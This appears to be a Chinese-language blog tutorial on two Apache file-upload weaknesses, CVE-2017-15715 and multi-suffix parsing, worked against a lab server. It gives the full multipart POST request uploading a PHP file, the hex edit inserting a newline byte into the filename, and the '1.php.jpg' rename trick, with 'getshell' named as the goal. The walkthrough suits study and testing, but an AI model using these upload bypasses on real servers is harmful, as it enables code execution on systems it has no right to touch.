Apache中间件漏洞

目录

什么是Apache

Apache文件上传(CVE-2017-15715)

Apache后缀解析


什么是Apache

Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。

Apache文件上传(CVE-2017-15715)

此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略

第一步:打开网站页面发现为空白,直接抓包看,发现Apache的版本存在漏洞

第二步:使用burp抓包,抓包后发送,发现响应包中显示apache版本(此版本存在漏洞)

第三步:构造文件上传post文件 (发现上传失败)

POST / HTTP/1.1

Host: 192.168.66.141:50532

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------9552222486401230933854482358

Content-Length: 358

Connection: close

Upgrade-Insecure-Requests: 1



-----------------------------9552222486401230933854482358

Content-Disposition: form-data; name="file"; filename="1.php"

Content-Type: application/octet-stream



<?php phpinfo();?>

-----------------------------9552222486401230933854482358

Content-Disposition: form-data; name="name"



1.php

-----------------------------9552222486401230933854482358--

第四步:将文件名修改为1.php.xxx再次上传发现文件上传成功,证明此处为黑名单验证

第五步:在1.php后添加a为标记,打开Hex将a处的61修改为0a,然后将数据包发送

第六步:访问1.php%0a,成功访问到phpinfo

Apache后缀解析

Apache文件解析漏洞与用户的配置有密切的关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到一个解析文件的特性。Apache默认一个文件可以有多个以点.分割的后缀,当右边的后缀名无法识别,则继续向左识别;因此可以用于文件上传来绕过黑名单导致getshell。

第一步:上传php后缀文件,发现上传失败

第二步:抓取上传数据包将文件名修改为1.php.jpg,后进行上传

第三步:访问文件路径php成功解析

相关推荐
GZ_TOGOGO8 小时前
【2024最新】华为HCIE认证考试流程
大数据·人工智能·网络协议·网络安全·华为
0DayHP11 小时前
HTB:Ignition[WriteUP]
网络安全
Hugo_McQueen20 小时前
pWnos1.0 靶机渗透 (Perl CGI 的反弹 shell 利用)
linux·服务器·网络安全
栀夏61321 小时前
Kafka 快速入门
中间件
学习溢出1 天前
深入了解 net user 命令:上一次是谁登录的?
windows·网络安全·系统安全
zhangphil1 天前
Windows环境Apache httpd 2.4 web服务器加载PHP8:Hello,world!
php·apache·httpd
Dylanioucn1 天前
【分布式微服务云原生】探索Redis:数据结构的艺术与科学
数据结构·redis·分布式·缓存·中间件
CyberMuse1 天前
网络安全cybersecurity的几个新领域
网络安全
HEX9CF1 天前
【CTF Web】Pikachu xss之href输出 Writeup(GET请求+反射型XSS+javascript:伪协议绕过)
开发语言·前端·javascript·安全·网络安全·ecmascript·xss
kuber09091 天前
APISIX 联动雷池 WAF 实现 Web 安全防护
网络安全